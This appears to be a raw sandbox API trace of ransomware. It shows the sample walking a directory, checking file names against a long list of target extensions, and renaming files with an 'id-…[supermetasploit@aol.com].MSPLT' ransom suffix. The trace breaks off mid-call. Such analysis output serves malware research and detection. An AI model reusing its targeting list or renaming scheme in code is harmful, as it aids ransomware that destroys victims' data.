[0169.040] lstrcmpiW (lpString1=".htm", lpString2=".rtf") returned -1 [0169.040] lstrlenW (lpString=".html") returned 5 [0169.040] lstrcmpiW (lpString1=".html", lpString2="a.rtf") returned -1 [0169.040] lstrlenW (lpString=".icb") returned 4 [0169.040] lstrcmpiW (lpString1=".icb", lpString2=".rtf") returned -1 [0169.040] lstrlenW (lpString=".ics") returned 4 [0169.040] lstrcmpiW (lpString1=".ics", lpString2=".rtf") returned -1 [0169.040] lstrlenW (lpString=".iff") returned 4 [0169.040] lstrcmpiW (lpString1=".iff", lpString2=".rtf") returned -1 [0169.040] lstrlenW (lpString=".inc") returned 4 [0169.041] lstrcmpiW (lpString1=".inc", lpString2=".rtf") returned -1 [0169.041] lstrlenW (lpString=".indd") returned 5 [0169.041] lstrcmpiW (lpString1=".indd", lpString2="a.rtf") returned -1 [0169.041] lstrlenW (lpString=".ini") returned 4 [0169.041] lstrcmpiW (lpString1=".ini", lpString2=".rtf") returned -1 [0169.041] lstrlenW (lpString=".iqy") returned 4 [0169.041] lstrcmpiW (lpString1=".iqy", lpString2=".rtf") returned -1 [0169.041] lstrlenW (lpString=".j2c") returned 4 [0169.041] lstrcmpiW (lpString1=".j2c", lpString2=".rtf") returned -1 [0169.041] lstrlenW (lpString=".j2k") returned 4 [0169.041] lstrcmpiW (lpString1=".j2k", lpString2=".rtf") returned -1 [0169.041] lstrlenW (lpString=".java") returned 5 [0169.041] lstrcmpiW (lpString1=".java", lpString2="a.rtf") returned -1 [0169.041] lstrlenW (lpString=".jp2") returned 4 [0169.041] lstrcmpiW (lpString1=".jp2", lpString2=".rtf") returned -1 [0169.041] lstrlenW (lpString=".jpc") returned 4 [0169.041] lstrcmpiW (lpString1=".jpc", lpString2=".rtf") returned -1 [0169.041] lstrlenW (lpString=".jpe") returned 4 [0169.041] lstrcmpiW (lpString1=".jpe", lpString2=".rtf") returned -1 [0169.041] lstrlenW (lpString=".jpeg") returned 5 [0169.041] lstrcmpiW (lpString1=".jpeg", lpString2="a.rtf") returned -1 [0169.041] lstrlenW (lpString=".jpf") returned 4 [0169.041] lstrcmpiW (lpString1=".jpf", lpString2=".rtf") returned -1 [0169.041] lstrlenW (lpString=".jpg") returned 4 [0169.041] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0169.041] lstrlenW (lpString=".jpx") returned 4 [0169.042] lstrcmpiW (lpString1=".jpx", lpString2=".rtf") returned -1 [0169.042] lstrlenW (lpString=".js") returned 3 [0169.042] lstrcmpiW (lpString1=".js", lpString2="rtf") returned -1 [0169.042] lstrlenW (lpString=".jsf") returned 4 [0169.042] lstrcmpiW (lpString1=".jsf", lpString2=".rtf") returned -1 [0169.042] lstrlenW (lpString=".json") returned 5 [0169.042] lstrcmpiW (lpString1=".json", lpString2="a.rtf") returned -1 [0169.042] lstrlenW (lpString=".jsp") returned 4 [0169.042] lstrcmpiW (lpString1=".jsp", lpString2=".rtf") returned -1 [0169.042] lstrlenW (lpString=".kdc") returned 4 [0169.042] lstrcmpiW (lpString1=".kdc", lpString2=".rtf") returned -1 [0169.042] lstrlenW (lpString=".kmz") returned 4 [0169.042] lstrcmpiW (lpString1=".kmz", lpString2=".rtf") returned -1 [0169.042] lstrlenW (lpString=".kwm") returned 4 [0169.042] lstrcmpiW (lpString1=".kwm", lpString2=".rtf") returned -1 [0169.042] lstrlenW (lpString=".lasso") returned 6 [0169.042] lstrcmpiW (lpString1=".lasso", lpString2="la.rtf") returned -1 [0169.042] lstrlenW (lpString=".lbi") returned 4 [0169.042] lstrcmpiW (lpString1=".lbi", lpString2=".rtf") returned -1 [0169.042] lstrlenW (lpString=".lgf") returned 4 [0169.042] lstrcmpiW (lpString1=".lgf", lpString2=".rtf") returned -1 [0169.042] lstrlenW (lpString=".lgp") returned 4 [0169.042] lstrcmpiW (lpString1=".lgp", lpString2=".rtf") returned -1 [0169.042] lstrlenW (lpString=".log") returned 4 [0169.042] lstrcmpiW (lpString1=".log", lpString2=".rtf") returned -1 [0169.042] lstrlenW (lpString=".m1v") returned 4 [0169.042] lstrcmpiW (lpString1=".m1v", lpString2=".rtf") returned -1 [0169.042] lstrlenW (lpString=".m4a") returned 4 [0169.042] lstrcmpiW (lpString1=".m4a", lpString2=".rtf") returned -1 [0169.043] lstrlenW (lpString=".m4v") returned 4 [0169.043] lstrcmpiW (lpString1=".m4v", lpString2=".rtf") returned -1 [0169.043] lstrlenW (lpString=".max") returned 4 [0169.043] lstrcmpiW (lpString1=".max", lpString2=".rtf") returned -1 [0169.043] lstrlenW (lpString=".md") returned 3 [0169.043] lstrcmpiW (lpString1=".md", lpString2="rtf") returned -1 [0169.043] lstrlenW (lpString=".mda") returned 4 [0169.043] lstrcmpiW (lpString1=".mda", lpString2=".rtf") returned -1 [0169.043] lstrlenW (lpString=".mdb") returned 4 [0169.043] lstrcmpiW (lpString1=".mdb", lpString2=".rtf") returned -1 [0169.043] lstrlenW (lpString=".mde") returned 4 [0169.043] lstrcmpiW (lpString1=".mde", lpString2=".rtf") returned -1 [0169.043] lstrlenW (lpString=".mdf") returned 4 [0169.043] lstrcmpiW (lpString1=".mdf", lpString2=".rtf") returned -1 [0169.043] lstrlenW (lpString=".mdw") returned 4 [0169.043] lstrcmpiW (lpString1=".mdw", lpString2=".rtf") returned -1 [0169.043] lstrlenW (lpString=".mef") returned 4 [0169.043] lstrcmpiW (lpString1=".mef", lpString2=".rtf") returned -1 [0169.043] lstrlenW (lpString=".mft") returned 4 [0169.043] lstrcmpiW (lpString1=".mft", lpString2=".rtf") returned -1 [0169.043] lstrlenW (lpString=".mfw") returned 4 [0169.043] lstrcmpiW (lpString1=".mfw", lpString2=".rtf") returned -1 [0169.043] lstrlenW (lpString=".mht") returned 4 [0169.043] lstrcmpiW (lpString1=".mht", lpString2=".rtf") returned -1 [0169.043] lstrlenW (lpString=".mhtml") returned 6 [0169.043] lstrcmpiW (lpString1=".mhtml", lpString2="la.rtf") returned -1 [0169.043] lstrlenW (lpString=".mka") returned 4 [0169.043] lstrcmpiW (lpString1=".mka", lpString2=".rtf") returned -1 [0169.044] lstrlenW (lpString=".mkidx") returned 6 [0169.044] lstrcmpiW (lpString1=".mkidx", lpString2="la.rtf") returned -1 [0169.044] lstrlenW (lpString=".mkv") returned 4 [0169.044] lstrcmpiW (lpString1=".mkv", lpString2=".rtf") returned -1 [0169.044] lstrlenW (lpString=".mos") returned 4 [0169.044] lstrcmpiW (lpString1=".mos", lpString2=".rtf") returned -1 [0169.044] lstrlenW (lpString=".mov") returned 4 [0169.044] lstrcmpiW (lpString1=".mov", lpString2=".rtf") returned -1 [0169.044] lstrlenW (lpString=".mp3") returned 4 [0169.044] lstrcmpiW (lpString1=".mp3", lpString2=".rtf") returned -1 [0169.044] lstrlenW (lpString=".mp4") returned 4 [0169.044] lstrcmpiW (lpString1=".mp4", lpString2=".rtf") returned -1 [0169.044] lstrlenW (lpString=".mpeg") returned 5 [0169.044] lstrcmpiW (lpString1=".mpeg", lpString2="a.rtf") returned -1 [0169.044] lstrlenW (lpString=".mpg") returned 4 [0169.044] lstrcmpiW (lpString1=".mpg", lpString2=".rtf") returned -1 [0169.044] lstrlenW (lpString=".mpv") returned 4 [0169.044] lstrcmpiW (lpString1=".mpv", lpString2=".rtf") returned -1 [0169.044] lstrlenW (lpString=".mrw") returned 4 [0169.044] lstrcmpiW (lpString1=".mrw", lpString2=".rtf") returned -1 [0169.044] lstrlenW (lpString=".msg") returned 4 [0169.044] lstrcmpiW (lpString1=".msg", lpString2=".rtf") returned -1 [0169.044] lstrlenW (lpString=".mxl") returned 4 [0169.044] lstrcmpiW (lpString1=".mxl", lpString2=".rtf") returned -1 [0169.044] lstrlenW (lpString=".myd") returned 4 [0169.044] lstrcmpiW (lpString1=".myd", lpString2=".rtf") returned -1 [0169.044] lstrlenW (lpString=".myi") returned 4 [0169.044] lstrcmpiW (lpString1=".myi", lpString2=".rtf") returned -1 [0169.044] lstrlenW (lpString=".nef") returned 4 [0169.045] lstrcmpiW (lpString1=".nef", lpString2=".rtf") returned -1 [0169.045] lstrlenW (lpString=".nrw") returned 4 [0169.045] lstrcmpiW (lpString1=".nrw", lpString2=".rtf") returned -1 [0169.045] lstrlenW (lpString=".obj") returned 4 [0169.045] lstrcmpiW (lpString1=".obj", lpString2=".rtf") returned -1 [0169.045] lstrlenW (lpString=".odb") returned 4 [0169.045] lstrcmpiW (lpString1=".odb", lpString2=".rtf") returned -1 [0169.045] lstrlenW (lpString=".odc") returned 4 [0169.045] lstrcmpiW (lpString1=".odc", lpString2=".rtf") returned -1 [0169.045] lstrlenW (lpString=".odm") returned 4 [0169.045] lstrcmpiW (lpString1=".odm", lpString2=".rtf") returned -1 [0169.045] lstrlenW (lpString=".odp") returned 4 [0169.045] lstrcmpiW (lpString1=".odp", lpString2=".rtf") returned -1 [0169.045] lstrlenW (lpString=".ods") returned 4 [0169.045] lstrcmpiW (lpString1=".ods", lpString2=".rtf") returned -1 [0169.045] lstrlenW (lpString=".oft") returned 4 [0169.045] lstrcmpiW (lpString1=".oft", lpString2=".rtf") returned -1 [0169.045] lstrlenW (lpString=".one") returned 4 [0169.045] lstrcmpiW (lpString1=".one", lpString2=".rtf") returned -1 [0169.045] lstrlenW (lpString=".onepkg") returned 7 [0169.045] lstrcmpiW (lpString1=".onepkg", lpString2="ula.rtf") returned -1 [0169.045] lstrlenW (lpString=".onetoc2") returned 8 [0169.045] lstrcmpiW (lpString1=".onetoc2", lpString2="eula.rtf") returned -1 [0169.045] lstrlenW (lpString=".opt") returned 4 [0169.045] lstrcmpiW (lpString1=".opt", lpString2=".rtf") returned -1 [0169.045] lstrlenW (lpString=".oqy") returned 4 [0169.045] lstrcmpiW (lpString1=".oqy", lpString2=".rtf") returned -1 [0169.045] lstrlenW (lpString=".orf") returned 4 [0169.046] lstrcmpiW (lpString1=".orf", lpString2=".rtf") returned -1 [0169.046] lstrlenW (lpString=".p12") returned 4 [0169.046] lstrcmpiW (lpString1=".p12", lpString2=".rtf") returned -1 [0169.046] lstrlenW (lpString=".p7b") returned 4 [0169.046] lstrcmpiW (lpString1=".p7b", lpString2=".rtf") returned -1 [0169.046] lstrlenW (lpString=".p7c") returned 4 [0169.046] lstrcmpiW (lpString1=".p7c", lpString2=".rtf") returned -1 [0169.046] lstrlenW (lpString=".pam") returned 4 [0169.046] lstrcmpiW (lpString1=".pam", lpString2=".rtf") returned -1 [0169.046] lstrlenW (lpString=".pbm") returned 4 [0169.046] lstrcmpiW (lpString1=".pbm", lpString2=".rtf") returned -1 [0169.046] lstrlenW (lpString=".pct") returned 4 [0169.046] lstrcmpiW (lpString1=".pct", lpString2=".rtf") returned -1 [0169.046] lstrlenW (lpString=".pcx") returned 4 [0169.046] lstrcmpiW (lpString1=".pcx", lpString2=".rtf") returned -1 [0169.046] lstrlenW (lpString=".pdd") returned 4 [0169.046] lstrcmpiW (lpString1=".pdd", lpString2=".rtf") returned -1 [0169.046] lstrlenW (lpString=".pdf") returned 4 [0169.046] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0169.046] lstrlenW (lpString=".pdp") returned 4 [0169.046] lstrcmpiW (lpString1=".pdp", lpString2=".rtf") returned -1 [0169.046] lstrlenW (lpString=".pef") returned 4 [0169.046] lstrcmpiW (lpString1=".pef", lpString2=".rtf") returned -1 [0169.046] lstrlenW (lpString=".pem") returned 4 [0169.046] lstrcmpiW (lpString1=".pem", lpString2=".rtf") returned -1 [0169.046] lstrlenW (lpString=".pff") returned 4 [0169.047] lstrcmpiW (lpString1=".pff", lpString2=".rtf") returned -1 [0169.047] lstrlenW (lpString=".pfm") returned 4 [0169.047] lstrcmpiW (lpString1=".pfm", lpString2=".rtf") returned -1 [0169.047] lstrlenW (lpString=".pfx") returned 4 [0169.047] lstrcmpiW (lpString1=".pfx", lpString2=".rtf") returned -1 [0169.047] lstrlenW (lpString=".pgm") returned 4 [0169.047] lstrcmpiW (lpString1=".pgm", lpString2=".rtf") returned -1 [0169.047] lstrlenW (lpString=".php") returned 4 [0169.047] lstrcmpiW (lpString1=".php", lpString2=".rtf") returned -1 [0169.047] lstrlenW (lpString=".php3") returned 5 [0169.047] lstrcmpiW (lpString1=".php3", lpString2="a.rtf") returned -1 [0169.047] lstrlenW (lpString=".php4") returned 5 [0169.047] lstrcmpiW (lpString1=".php4", lpString2="a.rtf") returned -1 [0169.047] lstrlenW (lpString=".php5") returned 5 [0169.047] lstrcmpiW (lpString1=".php5", lpString2="a.rtf") returned -1 [0169.047] lstrlenW (lpString=".phtml") returned 6 [0169.047] lstrcmpiW (lpString1=".phtml", lpString2="la.rtf") returned -1 [0169.047] lstrlenW (lpString=".pict") returned 5 [0169.047] lstrcmpiW (lpString1=".pict", lpString2="a.rtf") returned -1 [0169.047] lstrlenW (lpString=".pl") returned 3 [0169.047] lstrcmpiW (lpString1=".pl", lpString2="rtf") returned -1 [0169.047] lstrlenW (lpString=".pls") returned 4 [0169.047] lstrcmpiW (lpString1=".pls", lpString2=".rtf") returned -1 [0169.047] lstrlenW (lpString=".pm") returned 3 [0169.047] lstrcmpiW (lpString1=".pm", lpString2="rtf") returned -1 [0169.047] lstrlenW (lpString=".png") returned 4 [0169.047] lstrcmpiW (lpString1=".png", lpString2=".rtf") returned -1 [0169.047] lstrlenW (lpString=".pnm") returned 4 [0169.047] lstrcmpiW (lpString1=".pnm", lpString2=".rtf") returned -1 [0169.048] lstrlenW (lpString=".pot") returned 4 [0169.048] lstrcmpiW (lpString1=".pot", lpString2=".rtf") returned -1 [0169.048] lstrlenW (lpString=".potm") returned 5 [0169.048] lstrcmpiW (lpString1=".potm", lpString2="a.rtf") returned -1 [0169.048] lstrlenW (lpString=".potx") returned 5 [0169.048] lstrcmpiW (lpString1=".potx", lpString2="a.rtf") returned -1 [0169.048] lstrlenW (lpString=".ppa") returned 4 [0169.048] lstrcmpiW (lpString1=".ppa", lpString2=".rtf") returned -1 [0169.048] lstrlenW (lpString=".ppam") returned 5 [0169.048] lstrcmpiW (lpString1=".ppam", lpString2="a.rtf") returned -1 [0169.048] lstrlenW (lpString=".ppm") returned 4 [0169.048] lstrcmpiW (lpString1=".ppm", lpString2=".rtf") returned -1 [0169.048] lstrlenW (lpString=".pps") returned 4 [0169.048] lstrcmpiW (lpString1=".pps", lpString2=".rtf") returned -1 [0169.048] lstrlenW (lpString=".ppsm") returned 5 [0169.048] lstrcmpiW (lpString1=".ppsm", lpString2="a.rtf") returned -1 [0169.048] lstrlenW (lpString=".ppt") returned 4 [0169.048] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0169.048] lstrlenW (lpString=".pptm") returned 5 [0169.048] lstrcmpiW (lpString1=".pptm", lpString2="a.rtf") returned -1 [0169.048] lstrlenW (lpString=".pptx") returned 5 [0169.048] lstrcmpiW (lpString1=".pptx", lpString2="a.rtf") returned -1 [0169.048] lstrlenW (lpString=".prn") returned 4 [0169.048] lstrcmpiW (lpString1=".prn", lpString2=".rtf") returned -1 [0169.048] lstrlenW (lpString=".ps") returned 3 [0169.048] lstrcmpiW (lpString1=".ps", lpString2="rtf") returned -1 [0169.048] lstrlenW (lpString=".psb") returned 4 [0169.048] lstrcmpiW (lpString1=".psb", lpString2=".rtf") returned -1 [0169.048] lstrlenW (lpString=".psd") returned 4 [0169.049] lstrcmpiW (lpString1=".psd", lpString2=".rtf") returned -1 [0169.049] lstrlenW (lpString=".pst") returned 4 [0169.049] lstrcmpiW (lpString1=".pst", lpString2=".rtf") returned -1 [0169.049] lstrlenW (lpString=".ptx") returned 4 [0169.049] lstrcmpiW (lpString1=".ptx", lpString2=".rtf") returned -1 [0169.049] lstrlenW (lpString=".pub") returned 4 [0169.049] lstrcmpiW (lpString1=".pub", lpString2=".rtf") returned -1 [0169.049] lstrlenW (lpString=".pwm") returned 4 [0169.049] lstrcmpiW (lpString1=".pwm", lpString2=".rtf") returned -1 [0169.049] lstrlenW (lpString=".pxr") returned 4 [0169.049] lstrcmpiW (lpString1=".pxr", lpString2=".rtf") returned -1 [0169.049] lstrlenW (lpString=".py") returned 3 [0169.049] lstrcmpiW (lpString1=".py", lpString2="rtf") returned -1 [0169.049] lstrlenW (lpString=".qt") returned 3 [0169.049] lstrcmpiW (lpString1=".qt", lpString2="rtf") returned -1 [0169.049] lstrlenW (lpString=".r3d") returned 4 [0169.049] lstrcmpiW (lpString1=".r3d", lpString2=".rtf") returned -1 [0169.049] lstrlenW (lpString=".raf") returned 4 [0169.049] lstrcmpiW (lpString1=".raf", lpString2=".rtf") returned -1 [0169.049] lstrlenW (lpString=".rar") returned 4 [0169.049] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0169.049] FindNextFileW (in: hFindFile=0x801ed8, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59b8ac04, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x59b8ac04, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59b8ac04, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0169.049] FindNextFileW (in: hFindFile=0x801ed8, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed90, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0169.050] FindNextFileW (in: hFindFile=0x801ed8, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0169.050] FindNextFileW (in: hFindFile=0x801ed8, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0169.050] FindClose (in: hFindFile=0x801ed8 | out: hFindFile=0x801ed8) returned 1 [0169.050] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0169.050] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1029", cAlternateFileName="")) returned 1 [0169.050] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3e90058 [0169.050] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029") returned 26 [0169.050] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1029\\*", lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x59e13571, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8022d8 [0169.051] FindNextFileW (in: hFindFile=0x8022d8, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x59e13571, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.051] FindNextFileW (in: hFindFile=0x8022d8, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x59d7a9ee, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x59d7a9ee, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59d7a9ee, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xf74, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0169.051] lstrlenW (lpString="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT") returned 52 [0169.051] lstrlenW (lpString=".1cd") returned 4 [0169.051] lstrcmpiW (lpString1=".1cd", lpString2="SPLT") returned -1 [0169.051] lstrlenW (lpString=".3ds") returned 4 [0169.051] lstrcmpiW (lpString1=".3ds", lpString2="SPLT") returned -1 [0169.051] lstrlenW (lpString=".3fr") returned 4 [0169.051] lstrcmpiW (lpString1=".3fr", lpString2="SPLT") returned -1 [0169.051] lstrlenW (lpString=".3g2") returned 4 [0169.051] lstrcmpiW (lpString1=".3g2", lpString2="SPLT") returned -1 [0169.051] lstrlenW (lpString=".3gp") returned 4 [0169.051] lstrcmpiW (lpString1=".3gp", lpString2="SPLT") returned -1 [0169.051] lstrlenW (lpString=".7z") returned 3 [0169.051] lstrcmpiW (lpString1=".7z", lpString2="PLT") returned -1 [0169.051] lstrlenW (lpString=".accda") returned 6 [0169.051] lstrcmpiW (lpString1=".accda", lpString2=".MSPLT") returned -1 [0169.051] lstrlenW (lpString=".accdb") returned 6 [0169.051] lstrcmpiW (lpString1=".accdb", lpString2=".MSPLT") returned -1 [0169.051] lstrlenW (lpString=".accdc") returned 6 [0169.051] lstrcmpiW (lpString1=".accdc", lpString2=".MSPLT") returned -1 [0169.051] lstrlenW (lpString=".accde") returned 6 [0169.052] lstrcmpiW (lpString1=".accde", lpString2=".MSPLT") returned -1 [0169.052] lstrlenW (lpString=".accdt") returned 6 [0169.052] lstrcmpiW (lpString1=".accdt", lpString2=".MSPLT") returned -1 [0169.052] lstrlenW (lpString=".accdw") returned 6 [0169.052] lstrcmpiW (lpString1=".accdw", lpString2=".MSPLT") returned -1 [0169.052] lstrlenW (lpString=".adb") returned 4 [0169.052] lstrcmpiW (lpString1=".adb", lpString2="SPLT") returned -1 [0169.052] lstrlenW (lpString=".adp") returned 4 [0169.052] lstrcmpiW (lpString1=".adp", lpString2="SPLT") returned -1 [0169.052] lstrlenW (lpString=".ai") returned 3 [0169.052] lstrcmpiW (lpString1=".ai", lpString2="PLT") returned -1 [0169.052] lstrlenW (lpString=".ai3") returned 4 [0169.052] lstrcmpiW (lpString1=".ai3", lpString2="SPLT") returned -1 [0169.052] lstrlenW (lpString=".ai4") returned 4 [0169.052] lstrcmpiW (lpString1=".ai4", lpString2="SPLT") returned -1 [0169.052] lstrlenW (lpString=".ai5") returned 4 [0169.052] lstrcmpiW (lpString1=".ai5", lpString2="SPLT") returned -1 [0169.052] lstrlenW (lpString=".ai6") returned 4 [0169.052] lstrcmpiW (lpString1=".ai6", lpString2="SPLT") returned -1 [0169.052] lstrlenW (lpString=".ai7") returned 4 [0169.052] lstrcmpiW (lpString1=".ai7", lpString2="SPLT") returned -1 [0169.052] lstrlenW (lpString=".ai8") returned 4 [0169.052] lstrcmpiW (lpString1=".ai8", lpString2="SPLT") returned -1 [0169.052] lstrlenW (lpString=".anim") returned 5 [0169.052] lstrcmpiW (lpString1=".anim", lpString2="MSPLT") returned -1 [0169.052] lstrlenW (lpString=".arw") returned 4 [0169.052] lstrcmpiW (lpString1=".arw", lpString2="SPLT") returned -1 [0169.052] lstrlenW (lpString=".as") returned 3 [0169.052] lstrcmpiW (lpString1=".as", lpString2="PLT") returned -1 [0169.053] lstrlenW (lpString=".asa") returned 4 [0169.053] lstrcmpiW (lpString1=".asa", lpString2="SPLT") returned -1 [0169.053] lstrlenW (lpString=".asc") returned 4 [0169.053] lstrcmpiW (lpString1=".asc", lpString2="SPLT") returned -1 [0169.053] lstrlenW (lpString=".ascx") returned 5 [0169.053] lstrcmpiW (lpString1=".ascx", lpString2="MSPLT") returned -1 [0169.053] lstrlenW (lpString=".asm") returned 4 [0169.053] lstrcmpiW (lpString1=".asm", lpString2="SPLT") returned -1 [0169.053] lstrlenW (lpString=".asmx") returned 5 [0169.053] lstrcmpiW (lpString1=".asmx", lpString2="MSPLT") returned -1 [0169.053] lstrlenW (lpString=".asp") returned 4 [0169.053] lstrcmpiW (lpString1=".asp", lpString2="SPLT") returned -1 [0169.053] lstrlenW (lpString=".aspx") returned 5 [0169.053] lstrcmpiW (lpString1=".aspx", lpString2="MSPLT") returned -1 [0169.053] lstrlenW (lpString=".asr") returned 4 [0169.053] lstrcmpiW (lpString1=".asr", lpString2="SPLT") returned -1 [0169.053] lstrlenW (lpString=".asx") returned 4 [0169.053] lstrcmpiW (lpString1=".asx", lpString2="SPLT") returned -1 [0169.053] lstrlenW (lpString=".avi") returned 4 [0169.053] lstrcmpiW (lpString1=".avi", lpString2="SPLT") returned -1 [0169.053] lstrlenW (lpString=".avs") returned 4 [0169.053] lstrcmpiW (lpString1=".avs", lpString2="SPLT") returned -1 [0169.053] lstrlenW (lpString=".backup") returned 7 [0169.053] lstrcmpiW (lpString1=".backup", lpString2="].MSPLT") returned -1 [0169.053] lstrlenW (lpString=".bak") returned 4 [0169.053] lstrcmpiW (lpString1=".bak", lpString2="SPLT") returned -1 [0169.053] lstrlenW (lpString=".bay") returned 4 [0169.053] lstrcmpiW (lpString1=".bay", lpString2="SPLT") returned -1 [0169.053] lstrlenW (lpString=".bd") returned 3 [0169.053] lstrcmpiW (lpString1=".bd", lpString2="PLT") returned -1 [0169.054] lstrlenW (lpString=".bin") returned 4 [0169.054] lstrcmpiW (lpString1=".bin", lpString2="SPLT") returned -1 [0169.054] lstrlenW (lpString=".bmp") returned 4 [0169.054] lstrcmpiW (lpString1=".bmp", lpString2="SPLT") returned -1 [0169.054] lstrlenW (lpString=".bz2") returned 4 [0169.054] lstrcmpiW (lpString1=".bz2", lpString2="SPLT") returned -1 [0169.054] lstrlenW (lpString=".c") returned 2 [0169.054] lstrcmpiW (lpString1=".c", lpString2="LT") returned -1 [0169.054] lstrlenW (lpString=".cdr") returned 4 [0169.054] lstrcmpiW (lpString1=".cdr", lpString2="SPLT") returned -1 [0169.054] lstrlenW (lpString=".cer") returned 4 [0169.054] lstrcmpiW (lpString1=".cer", lpString2="SPLT") returned -1 [0169.054] lstrlenW (lpString=".cf") returned 3 [0169.054] lstrcmpiW (lpString1=".cf", lpString2="PLT") returned -1 [0169.054] lstrlenW (lpString=".cfc") returned 4 [0169.054] lstrcmpiW (lpString1=".cfc", lpString2="SPLT") returned -1 [0169.054] lstrlenW (lpString=".cfm") returned 4 [0169.054] lstrcmpiW (lpString1=".cfm", lpString2="SPLT") returned -1 [0169.054] lstrlenW (lpString=".cfml") returned 5 [0169.054] lstrcmpiW (lpString1=".cfml", lpString2="MSPLT") returned -1 [0169.054] lstrlenW (lpString=".cfu") returned 4 [0169.054] lstrcmpiW (lpString1=".cfu", lpString2="SPLT") returned -1 [0169.054] lstrlenW (lpString=".chm") returned 4 [0169.054] lstrcmpiW (lpString1=".chm", lpString2="SPLT") returned -1 [0169.054] lstrlenW (lpString=".cin") returned 4 [0169.054] lstrcmpiW (lpString1=".cin", lpString2="SPLT") returned -1 [0169.054] lstrlenW (lpString=".class") returned 6 [0169.054] lstrcmpiW (lpString1=".class", lpString2=".MSPLT") returned -1 [0169.055] lstrlenW (lpString=".clx") returned 4 [0169.055] lstrcmpiW (lpString1=".clx", lpString2="SPLT") returned -1 [0169.055] lstrlenW (lpString=".config") returned 7 [0169.055] lstrcmpiW (lpString1=".config", lpString2="].MSPLT") returned -1 [0169.055] lstrlenW (lpString=".cpp") returned 4 [0169.055] lstrcmpiW (lpString1=".cpp", 